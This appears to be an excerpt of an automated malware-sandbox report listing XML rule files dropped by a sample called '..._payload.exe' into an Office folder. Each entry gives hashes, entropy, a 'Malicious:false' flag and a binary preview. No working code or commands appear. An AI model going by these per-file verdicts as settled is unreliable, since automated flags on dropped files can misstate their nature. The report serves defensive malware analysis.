                                                                                                      SSDEEP:24:JjBKdY7exlNaCdMxNsAWHVjwTxQMuNE2WVhyFpTYM/UFkyn5Jva3MqkVasBjqaIc:pn5CEsAWFMuNEDMyn5JUMqQBHIIFYzXs
                                                                                                      MD5:BEACD85DD212548AF766F13E4A219DD0
                                                                                                      SHA1:1C7BC8339174CD8F9ED246EEC9D59822D2492AEB
                                                                                                      SHA-256:704DE0A8C64BF75769D0D2ACA4873EAE35882DE1C484B39F72C8FC63EF5EB278
                                                                                                      SHA-512:646E9FBC95A1B8CBA55BC3D7F669D373E66D72D6D7B0A680D77001FEEAC159FC0B5926827773B260F50FE34F0C3A0BCAE470AFD0A8339DA21E24F0A4046F22BA
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml........n.....W./...J.]N...6..=.V..z..f".I$.....#.........U?...h....[..4..,.i..6^.j....3?;R,.T%.............{.j.fkc....C..FV.p....x....L?..p.N...6.z.b..OXD9..lf.WZ.$....{...u.E..m...bV....`Gmn.v......5.#.`..;%.&.r-.........P:./+.1w..0J...3.^.........xb.'..Kep..(|..6.[V..$B.L.nN...v.\W.z...?y.pB.U#3.\.u..!Sd&x....5.X_....RHJ...Q0&.L.......y.....d...o..~..bV.A2.I%R.....N......E.-A......<d.qbc........R...P[S..`r.P8.%>K...TXi..iV$./.a<..F......L.!h.h._..1Ow,.\.A..Hn....qqR?.......m.g...ch.BcKw.8....t.......'k.....w..0....+j...^.[.?..K..p.q.n..I.Woj_.7O..m.A...I..^..V...7.f.J..........y.8.0.......#.c...-..d.(..Oeg ....y...i..;C.#A...I.c...|m..,.&...k.m/tY.....5N....T.L.8D8iy..8q..Hr..fH.Nd-.{[D...,&{o.&..q.z.........>...Y)....Eb|..3...\;a.u.{..ZJ..<(4E-...UV..Q?4...iS...LE.....%..+..nW.....q@..l.`.|.....z..H.....q...v.5oa8..n.?l8.#2R...x...%..6N.k. .Yk.wN....../I....<..p......u.B..<k....g........}......'...cm......DB...5.eh0j.).P.?...C.l

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11705v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3505
                                                                                                      Entropy (8bit):7.950132132085
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:z2ZiQGefqAvydhd5N4a6OZefVE0oZiM3mW:kTGaqAvjdOZefVTuiA
                                                                                                      MD5:200252C3F3FB393589E77C0BA5A0DA21
                                                                                                      SHA1:8E2FD1E4C5EF331B068C760C3B8976CB44DCB339
                                                                                                      SHA-256:6881B708BD7DCA7B1F5230C41979CA88CA1DB76DFB82894F31337C5BF9FE5382
                                                                                                      SHA-512:7C58CAFA3A5235527546BC88607941D196359DF0227643A4B51E2EA479924979E6B134C4021B0B2D7386C5C146FDB94EDD4B20561958D83BB155A401745C626E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlte.%.QfC.v M.u..2..4..q...}y_..t.tP~..........N.hb.g.h.c....a.R..R{g.<...nqZB.x.ZD.Q.o...[.t%pxn....f..(=.....C...3...9........K.jo.._...vW.Y.DJ..7..%.F.7.2...jR...@...?5..IS.?P7...:..6.ci....<}L..Ns....m.6....t.J?h.F.;...w$H8..J..q.'.\...t3}m\.U......f..0..dO...^......Uk%k.t...s.......9R...L.C.(.?@.....^.....}..lO..h......2.6S2...$*..B.g...L).=.q......cF .{.(.......M...]..(B.2.\.'..BN.}..m#)...?b.r|.....].h...A4~7.....C/.";.3*.7..B.$20y.@..^.F...S.5........5..}.?n...E....O.[$..1lv....o..2.....l[.8.b..$..n.....xeB....zW.4..p.......z<.....kL.`.k...<......H@.=.,......r..7s..r.*..'M.<........n...l..Tf}.z@9.=.Z.)R....@.B...X..O..8....`.....Oe[. ......6.....{.{.E..~..-.|.f.........$..HU.E.U.yS...?..{BNXY.2'.i..O!.L)~.b......i.Uu.t(..Ym.j`$,...].Q.a..s..oi..`...u......c..C.0.f/.C..O.5;.y....s@Sc.,.,\GQv4....)..r3f.9.JY..M@w...Ls...L8baAt#....^..K....\.|{...(...W....w.~...M....."..A}..k..Ds... .W=#j.X..s.H..t...V}w..Q..-+..;q..ZK.6?4..fn..9..c...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11710v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):965
                                                                                                      Entropy (8bit):7.7428375098250815
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:/D7/Pk5CjU9v95z6fDSwdXFcXZ9ycPkBzQ5gn8v6bD:/Dr+z9l5z6fBd+5k668wD
                                                                                                      MD5:C2F8B1E4A39A41B3634F1AD8DC2F265B
                                                                                                      SHA1:C6A0AB418C7327FBA0389B362AD6632B7D26EC0F
                                                                                                      SHA-256:8C0CB2C865B191FAB2A0E8432B18313546173E557C9FBAC714311CD6DF4D330B
                                                                                                      SHA-512:151194265C2CF192203531151F614523AC2501E0F0C949FBA3EE575BF7B520D3ADFEA8B9A89B242D05CF64F3B90968D5DE4B857709EC33BAC1FFB1B52E28DB83
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlf.j..>..|-A..Q........61..3:.7......8W..T<...@~..Y..1xTo....F..TN.Lh..dd..8]...'vi.|.!.!.........%.....`....X.9.e|6..uc.(..-.'.....I......>D.?..x...N..Y....{..EGNx.(...M$f.{.F......P..7l..........A.j.1Dtw.A..b..7......gu.R&#..............5.n....;q-H.m.....~T.X[...6..c..i..#s..5.p....p:D...'...D..^4p=*.O..:A...3~.._C...n.cK.>...B.......+.<..C....../.d.~......q..3.Tf.eO...`.o&Q;.tx. ..Q...t[..Z.I.d.2'.......me...el.Q.`.:7.......F..P>.c..X....|...!w.L...O./3.......F...A.f.....SY.;......Z..T..m{...............zJ.....H.T.....)!'.O.].../s.4.kD.....*.QfKdy;<.4...~..=(.-0.G9.N.w.]:..._qQe..oWm...0S..~-.Zn;....6c].I.3~?....&1..<6tm.~.Q..........j.:..c._qu...}.a:.Y..`.k~.hHC.d.$...H...5....qx_...-...-...p.Y.~..V.(...F9.%..Q......7)....".Aa.eQv>r.^0.......-.Zq......P:V..}.......(d.#..G.U.X...E=.s...&gU...".M..G.6.n.p..~.D..d..#.)....T(.<..A...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11767v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2983
                                                                                                      Entropy (8bit):7.936901630068254
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:js1Y/oXIFQixaVKPVq+GsJHVoKG6KlL6um4IUmfnkCo8BYnFUIsW0X3MKFKhRy7o:jvm82sJHr2lLJlVmvo8ynFUW0X3lKLyc
                                                                                                      MD5:62DA1440631B6AE298A8194262E87DFD
                                                                                                      SHA1:8509E3AE9BB39092E6FF2C60A92A19776E82F70F
                                                                                                      SHA-256:BA99CD55783D92E491158C9BB4746748BF498465E10FE860E0158ED86E6FE21B
                                                                                                      SHA-512:89D153C9B79A7954E3CD675982F2154800B3FFC1E7A51511DE0331FDA95A49929555C88F2873B2B1A11754AD58A1F3BCB8D0AF08AFA6B3795966111C3904E11F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmly.O..K......O...~..9pS.y...N.0~->.k.............(.......&Y.^....B..W|.YY.M..=Z....ktF..Oj.......UX..sF.^...^T.HN\....>.?'.oYe......J.{.....[........-|..D..U...=o+.c.j..g..kIV..0...^..Z.s.v.s..M..#.}..._...x.}[.VA..'...;G^x.....E0.3.A......$.$.....&F..C""....M......%.0.Q......U...-C....4.Vl.1...4.?..C.5,....j......xbp ..O....c.p...S..K.W....L..M.............H...'...f._I.......UR7l...s....;,.....m.d=..5E.U...&;sr-9....).L.*.,s...V.\a..:rx....."..d...o52.H....x.0).H.Z...._..1N.8..'g....1.S.b.9[.2...C....1rx../....V.2}..wU......JU...;......v;...WC...O}.k..B6y.o...$6..8......Y...^@\...V....q.j.2{...3J.....|'.Z..W.#.0s..L...'.(.._.d_.8V.-.~..Z,I~P.+8..5f.`.N.)...;n.f.b.fq..Y..\.....g`..9..............1.d..s........(4.q...%r..~9....38.....N.|..x,...>{....K....D.oJ..q.c$Z.E.......x...~X.L.........Y.5`.u9M.{"/'.G...`.y....=&...T6.4d...-........2bs.*...:.i.J.......]4`..q?...M..@.i..;.KD{.S.....<.r._r"........n.!...O.pf~.k8U.L.&.+.3e.......P...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11768v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2487
                                                                                                      Entropy (8bit):7.922649331543122
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:kdYRLh2UA2l6sqEa5ptA2BL6jbLaOMwqp9iw6COG7QaCY0N3q42iZt2pXwD:kK1Wqa5jtBLObqwqbiw6CO2J0jYpc
                                                                                                      MD5:9596FEC66A48F0514F7075DB03BEB301
                                                                                                      SHA1:A2698206A95D86B88FB1B3DE474FD9F1CC4DC56A
                                                                                                      SHA-256:1FF0DD2A443F6D1776D2F1921F16F79C5C157C49F97D56351BC569887F1701FF
                                                                                                      SHA-512:7E9009BD77C10FAA596226E3BA02EEAEAF18EF60744BD0C57CE4A6A852AA9D70F5A50656A16C4397D46AAC99CB982FA155D727CF89B3111920C6FD9A16A0499A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.5...j.K...U=$.'Hl.oia..g..Q.?C@..y-.y...7.6f.YA7U....1.AK.)...m.S..O.%.....8,.t^....... ......=.....8..*K..k......#..[p....o.(...Rh?)T.xV.#.T.X...[....>#. ..I.X.Z....6.T..,t..B.\...._Am.+..Z.l-....x>Q.[...A."9..4Y.F..B....8Y.s...8..FG......o.b....*...X..nJ$".:U...K....c.%....gY.>.5..n|.=....\A.m.T......^.v<...6.Z.`..b.W...O7..>......&..Qo...z..r.F..8O*Q...P..UM.p..,.A{..Q.............@2A.}.?%]IZ6.K..r.......K..&H..Q..V.H5...+.>0...~....g?f0.IB...-EHZ.yW...4X..<...Y.{..o.}#.]S.1c......H)..gx.C*.t.4)Er...o\...L}...S."..~.r<.G......B...k...1.j....oL.X.s+..6.B.S..,.....J.4-.Q..a8....-...1.......%`...?..I.Z............N.G.]...n......K....../....v...._o].............4l.]J....`.pk.!.9.'..5~.:OI.|...).....!.0.....q.2.F.p.SZ*..l.5....n..k..z...Z.Z.MV.B.........&l..c.6.q....,.......8^.S0.......k.3.<._>O..&.h..t\e...)...hp.....i;5....P.}.2..%.P..<.C...;.#.|&[..Yt._.].D`.1P....Q[W.t.s1. .hc.Jw..X..8....Q..){.\^......$.h.G6.',MF.=....N..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11769v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3132
                                                                                                      Entropy (8bit):7.9433089435039985
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:eVyn3GnAQ+xu2oDgOv/FI58iHA61RB5sP:eEn2nKxu2gguNIOigkB+P
                                                                                                      MD5:2590CE9F5B488F586E6C9429537410E8
                                                                                                      SHA1:20592D4C6FD3A20D7C6B5701C6D1B297C3AE97CC
                                                                                                      SHA-256:1DFDBB650D69B1287518C0BF2CB6F095DEBD3D216D27853FB0C6410CF054FA0F
                                                                                                      SHA-512:4F479400B0961CC7EB5AAB4B4297364444AB4EB21C68D7CBA2EACAA0D0BB4F5F2DEF6F5728E3857E05A8B5233462D4FEE1CE04FFC3C89A1B01E9B75A6E5E178C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml......e.c.X`...T..G.Y.S..064.D...[.&.pP.P..6.n.......RK#.:g..P.?..5...ci.$..}A..r..MJ.._.b....(<...Z..q-.D9.*0...j _k.....Ra2!~..DH.&.L.P/..$I.yM.....s0...[.....1........5K.-.2:w}3.)y.....K.p9E.."......`.n......."..a.......7\&.]i%iX.A.. .i#"....]..e..P.#mu...WO.[Enc.t..[. S..n...(Pr.C.w..0....+.7..2_.._./."..Z.8.._.."h..'....P...U.~..Cj..Y[.{o.....T.r....g..!Z.)eJ.d2Dd<t./.q..D..gCaaU\..nO.E.-..Xz.=....S]..:.#......<.,G..B.M..3vc..2.X.....x.W..8...2..>Sj.h....R >A.......f.{.q.[......ZXJ.db.Sv.#..p.d.}..[.1.]...m.V.1...~...<..>.b.%.->S.W...N.}.'....FK.>..k.E..@.t.tm...k.Q..{'.(.I....VX.`l.!..9*.....)b.{...<.>&..s.[..4.-..B..b.Vc...t..o..E.Y..k~..<Z.FXxdo......>.mu.RZ<...3.+..k..I.S.+......X....o.s.!=...../..QQ%..K.R.....z..._....d.\?.57.{z.0..-5..0q.........5;.^2*.l,TJ..2....d..@i.;-EMHp.%A........}#~.Wk".......m.....v...-x..c........GEU..|.#K.8..z...D.$L..._!...^GzR.g.=:8.upL.r,.g...|..........d..~..y.#....k.f...OR9Q..?...7..M0.|....k#w

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11770v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4968
                                                                                                      Entropy (8bit):7.956771196297589
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:9OMMfL7JOFxxf0C4djZrHrTOvvXbuqvY2eVe4KsGR3d69IOqE34Kxu3lF:93U+xSC8jZrHrTuDXDoElpZ4493j
                                                                                                      MD5:3BD6DADA3C4983B299C745C68B17A680
                                                                                                      SHA1:D3D7DDA958D6F3832B69A2BAF9CFE1F56732A79B
                                                                                                      SHA-256:01D827F8A88E99C6350DBEEF9B8BB949E3C0C3CBF66772F8927B285B64A5C57C
                                                                                                      SHA-512:86073EE263E0F7E993A6BE076FCD8CCA7DD986F086C24D6EAAFEC35A1CBC68C03EA78F87780141DFCD18627EB7FEBEDA7E4D711F2C9D6E5C6A1DD35F5345C434
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..&f.BJ..:.%.....]k......;..oc....4/..;q..4@..u......J.mFH.X...X7$Z.w?ki...)..xG..M.}r.E.$.v....W.2N.v.s.x....}..#...Z...}..d.....O.E.+E.{.....W4.~....[4~O.....2U$U.V.nr..W...\cD.vE2.H...c.O8n.x`....gY.7...O......3.Y.n.........E.F..B^R:....~ylG#yA....fP...X...)...x.._. .........D.rY.sM@..)f...rDOe..Mh..?x..oFO... ...T...F.......%...B....l..{..V..Y.a.~..a.w.......M.vI..7S.?.M.n.n.PbR}h).,m......-I/.9.6......z....`......MG.X.DclL...I....E.1[7......X.....'.../..~..m.Kt..XS6.B.L/w.].....x.....X.$?..6&.i*ViO.A_..z......"..1.k...$......w.XG/.M..!.y.q..+......9.......i.k.@Z.CD;T^.a.............x*..n......~.0A-....$.v..Gx.......s....4....a.......5.Xy.s.._.N....F(....}.;....Y|..r......|......#.n.].]...f...*...l..=.}..D.........i...<..:!..-.A*...._.8".....{.....k..B-...f..:..Qm..m..fSE...s%....,...S./p.p.7..J._t&.8...I.U.+0b....s 'I.bH?...a...C..Q.$....tN.B.pX>.T.A.y...l..G).%E1..#.5.G..|./.g....3...."/.$....`>.N"...wvp.#...i..&-..{......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11771v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7596
                                                                                                      Entropy (8bit):7.9771766822763
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:7DccpoihE/hFGTQQ6ia4K21QlKANi7A8EhV:MSosYhFtQ/aNlFiMR
                                                                                                      MD5:81824627EDAD8CD27BC01D9121220190
                                                                                                      SHA1:A0690B72D593ACBB346690C1BA03EE0A33380848
                                                                                                      SHA-256:EBB04011309855E5D8FB9DDBF9A3001EB7ADA74493DF8CA873558E2494DF19EF
                                                                                                      SHA-512:3B1B5BEC488848E932514A4D8C32D064BABCB284CFC025866491A229405A61402DCD92353C8ABC75BA1AD09BE941E70850D60CA2983F94BD616FB53BF62CA49B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.;.uC4.....}}..z.o.&9(7...P..][w.....{...3...=.*..mR.1wKbz9..9...qd.......qz}:L....I..n..?.._.V.0.*...9...h~M.%y.....,../..\.i...y.>!.7..Y..l.?i.....f.HS.~X."R)O....1....{.F..........o$..y+.MR\kk..p..wg.hYcB..8..d..CR.xO....2]..d\.i.B.......g..}..J....t.S|F...vi..|m....k.-.h.q.V.......e.......G.\.+.q.q......'....Q..H$.py..3....J...N...5T. K..,*._|.o....ipA.........].be2Zf.~.....y..Yx.HgVu..,..........`H..Vq..f...N.d..@Kl.w.K.*k.H..5.Q..6+.R...\*l..d........a......fVe).D......].}..r.....p.]m......$..^..5. .J..>x.?..z.&.(N.$r...$..4.......N..J|a.V...A[.y....}.X3.j.h.......@..5O..U......< ......G...<.Hg..Q..U....#.......@......xV..Q........xd..m.].&Jg..i.W.Y1.7y..TR...*j.;...Q|g... !D.7*.}.U..,H..TDX..Q....P..<' .fr....}:$b.L,......../.$G....(q.U..ZNA..0.......k....Q..e..5.......=7.dsv.B..sN.n.=.".ki-.....{.9..c:...q:..u....h$..[]...v.~..G.1*.mY...8.=.a..P.*.."K.@.&...M?a.3.`$1..".7..E...XAr....B.A.|2.!S.$.z..t.G..J.n(...@._NVc..CDW)..L.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11792v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7356
                                                                                                      Entropy (8bit):7.975734912985343
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Z9bpWui1fsGg62ajyqOFTVpH6oqee01EQHYteIzGQZz21u:ZOui1EPaebHHTeZFh
                                                                                                      MD5:AB947319F761D404C94BE8B66144B04A
                                                                                                      SHA1:3553912FAA61C279829AF0B72F92DCF927A3CC07
                                                                                                      SHA-256:9DCCFE23AC04EC3B37399AB0F626918A8CF1A13C67C25952DEAFB37061864D4E
                                                                                                      SHA-512:083369EA25F335B5F2DF72130E4942E8591D1C8784BBC2C184D6EF49BF9511244A9401C9AA73F3594F621AB891B344176C019C7CA0A4291432F32D9690C6E5E2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml!..B.l$].f9h.FO0...S.id..Q...B..A..-`. .]......./.....2f&......N...j...o.B.....q..*~..8.xv.-h....A{.B....+..<"rv.`...|3.t....;)g.s4h....c.c.$pVa.n..\.....0.Q.`...-y|-.[qj...T.y:)A.CU;~*..:.X.bS..V1..../...xhZ..j....kq.z...../..G}...k.P.K{..i.@).1...q.s .........'...cS..".&.!...9.Hu..u.~......H..S{9......N..u.lH.?4,.....".%-....\......Z..?9...7-.m..]..Y*.5r.U&.[.H*>G0..N...R.B.d."..h...Q.V{w...twN...l.L..3"..m8.aQ(..+vw.......*CiV...D.....9..pe7O.......p..e@.+..7.....Y.v..j7:.....6..Q8.X.._8D/..(.IA..2.l.P....!..*........<g5......B.-..Q..?1..*..@?...3.+Hv..{.Y.r=..d0p.0f......\.|..M6F.4B....ah..7P..)....Y..{...-..O...K....RW~Us...r..v...Xp.K..f?.;..A:..|...b..B....N...?~2{.}....B...h..J.6...o..f.j._............a..W..%N[.t......30.G.*./..4U...;p`....a.'...~..d..|..%..N....#0L..Y.dx.Dz.H.D..F......J...].k..[._.o}..fP.....k..e._"@....#L/..6..^....c...Vi..-..1R..-`.h.)........S..i...5...T....0...b._e~a/s.?]o.l...L.G5~..i!~}.l..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11793v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1551
                                                                                                      Entropy (8bit):7.882488150138993
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Z20ifIfsOJU8ZfHoEqUD9Vjaa3Tv5w2Jy7vkA+2p/W3PRV/dyqqKVgd4RKUke9bv:ZTrf1vHoEVdS7i2K57VxQe5UFwD
                                                                                                      MD5:B317137A99E4DCB39F7790B46D9DDF49
                                                                                                      SHA1:1518CE2870B33C589A3B44A065915A3E92D7DBFC
                                                                                                      SHA-256:437C3820A7F1E3045130732683598D1052BF34F6ABDCD2FC578689ABB4888890
                                                                                                      SHA-512:DCE71CF98EE92984D5E8698FA98D15B4C39DF30297B896FE260E33B464DBB3CDA21E9DD718A05E4C4FF08459F81FADB6864B330A5EB6FAD7636EB0DFD388DFE7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..._.%.fb.#w..@.....{..^>.,..........c..x.h.....^..Zt.....k}.r....P......}..>..1xc.S..-<e*}..JY....s..........r...I.l.....P.3..4.{j.//..>&.5..^..uy.,.U|j1..zH;......u<..4....>.......hS..7.........-B.k....`4c.~...AuJ..'...(..x..V-..U.f[.o..po.C p....Z_..h../.........[(....D.{$.%.u.*..m82.>...e.pT. Y......H.J8..]w=D}..hI.K....~..r\...?..DGx....ik.Gn......_.;.p..*s...U..msP.KIm._.b....#..%?I....!......}.q|e.b;. ..........o........2..8.x._.O......S. Q-%....e..7e1......m.#.....Mc!.b4.......P.\..e.eH.Y...W...1.I..y..;.h7.n...[W..F$.-R.:E7...M.#M...3B.f.l*.3..\!3(..&.<bk.<..9...7.....%......7......<z"{rO...%+`.;1.=...B{.tr........n".c..[.....t..8.....RX..13#./J....A........:.#x..%.a.,`....L...8...v#+E.."......$.8n4Y.I1....u.hAQ.H...M/L.)..^.....&....").A...q..%......7...[...'',j.N$.O...g.....SQ.;.z.pn.8....opY!&.#.....~.>).S..#(..m.E.m...t..9..u.$.V.eJ......r...t.X...+I.X(.....p.w..{5ly....fUR......IO......$3..eL/.........f.g..p~=.x.`rvv.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11794v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1716
                                                                                                      Entropy (8bit):7.8564200918163225
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:46/fv4ec8b7oK8+bDDEo9FSew+lNIpybtc/KDd2qNolMV5xMFmz4VmNTitvhLY34:4NONx3NIpwzJ2q9V5x6wKvhLY3E8wD
                                                                                                      MD5:3631CCA7FB384B3A92D0936A692A50AD
                                                                                                      SHA1:F93870146F98CCBDD6C008282EBC8FC5D74FBD90
                                                                                                      SHA-256:88C1FE526489BE32CDFE257378FF8D945A970F7973C6EDC11E8678BB1F0626CF
                                                                                                      SHA-512:DC55E2A1CA3B6CC98B01854F965640EA6213FACC059BA91E12FFC993B7DFF56857146DEA5BC91F78769222ECB6D986A0FC448BFAE7F376978427709EBBF34397
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlc:....C..-...izt.i....M......@..:.n.....z.i...j~.D..........(2.\##.d#j..8~}#..g...:Y6......[.d..3t.y.....l.....^z....:}..O..$W.H$..".#....".hU.a.z{.Q..j..+ .k....t!+.>.9W..G27x..@..YO...2A(1-....j(C.....*...u...(.\VT.e=...;.B-GX..".iW,.....VC7H..s.....6..\..h).L.e..D..o..#.....G=.^.g..,\...t...^..z\.`..1LjV..M=...z..$z... ...$.....j..f.|.3X.h.`.O.|..[..c..+.^.,..!.'m.f.'...3;....@.Lt.S..5z....zQ..O...o..\.x.)0.VuT.....z.M......k..X.|C.......E..?L.R9.B..{.%.omzpsM.,.L~1t~..]..F..A...Q..BX..J.j....d...r......q.e../.F........p.j.....}..>.eX._E..Q&........G+Q...n.~~|.g.E..,*}J..d...\N.......`.]C.).........C:.......K.....5.*?..!Z.1....#......L.....x.Vd..fr4.....t..k.8..M..u.e. ......k+6%++...u..PZ.:.....S..F.....0.:..k.k .....nc6D..K...f..{.k.r3...x=:.dJ..2Up..Q...Og....z0..~....]..{.....2T..iD...a^M.4Q.G'n.1...........u}..3.y....*T.)c.hI.<rZ.."..e..hL@.j.AI..x....U....X..8.....%X...,~C...X.....<.....F..3.*u&.sk.P.r....|us.m~.vN.$+....N...<..@.V.:

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11834v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1737
                                                                                                      Entropy (8bit):7.894489710197534
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:8jRKQk+ZcQAQRHcbu8ESLG5DKNUgtnc+94wD:8jRBjAQ8vLOWNY+9B
                                                                                                      MD5:D104FCC9C687BD6E227FD2C3F8E2ABCA
                                                                                                      SHA1:839ED3593A470EA0EFFBDB599660F41FF77FF81B
                                                                                                      SHA-256:59C83DCBB12B0BD6D7242B18D86A7964AACA2D65F52724955BE9DB1C6171C0F7
                                                                                                      SHA-512:E68FDF5589919F758748F47CB1D5AE47FF5127500ED752E2D470E67D87A738827B6FC122C0BB7EFAC32281CB798E51BCD83D45EF1674F776FB0E784DF5AE4922
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.....)............`.m.Y.V....7....Rw$...$.R|+].^|...4i.(.../Db.......J......._..7.+o..p..BD..sH..S..@..L..O..._.....>..b............@.k.^..K..v....WT@X~2..7....?...3..(.}R\....M.#....E}-...=r.4.kl[!...*,....z.?.q...0.I.(....P.......`..J.uW;."].^..Nim="..K1..C...A.=..L.....BxQ.\|8.....9/h`....CB.+\.t,..>.b....t....5.(.c...lr.iDWz..4.Vs.K.N..~.X....8??.3.....G..8............E`.....!^..7......Zj...W......PT..-M.C.^4..E17.t...~..r....;.b...,.2|.`k..M.;..n."9.....L;q..I.D...z.h...\...7NTH3.O'......r.......u......*.Di....m.j...U.]k.J<..o*.7.p.?.[.N.Xy...(x...%......)......(.yZi..mnMa...G.n.b...z..~......b/..+$yl..."..Wq;.-35..&....4.^.\...\D..j..9..e...q......*...k..K5.cA..H:....G`i.JZ. .C.x.Q6.h..)..#..@.U......0...dP...%....<`b..k......6..../y+..@..v..BG`....[.M..r..zD..N.9.5C5s .y.........I...H..(K..Q...J.[,.....F........6z\......|..=....{.Y}..S..&..;.y..o..>.<.Y.5.. Z\eSD..x...k.6..2..d......E.}..+...X.z.9.<.K....!4..iK4......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11882v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1448
                                                                                                      Entropy (8bit):7.872656706093924
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:xEk0aPDM95WGgOlz9iLnXUSCxbwZErSZkNTWeEr5USQgKbxQaCRbf6Gme7Zj3Zdv:d02D+5WGgOlz0XhC9kE2ZOTWeEeSQgdr
                                                                                                      MD5:A0E26BC5E550D5EECCEE8A56FF19F4FF
                                                                                                      SHA1:7515758656C4C39E57E8460459ED8BA9283586F3
                                                                                                      SHA-256:ECB8EE904DD28860529B10C59B422DCCC14FBEF15EB575C39292770635891BB8
                                                                                                      SHA-512:910031CE73464B716302DA26D6808F2722FEA938AD2288AC409DDF11FBAC44A7D6E31C7635E33C3F06A212F092C1F2E54CC65965EA9ABCE1566831FF83DF39E5
                                                                                                      Malicious:false
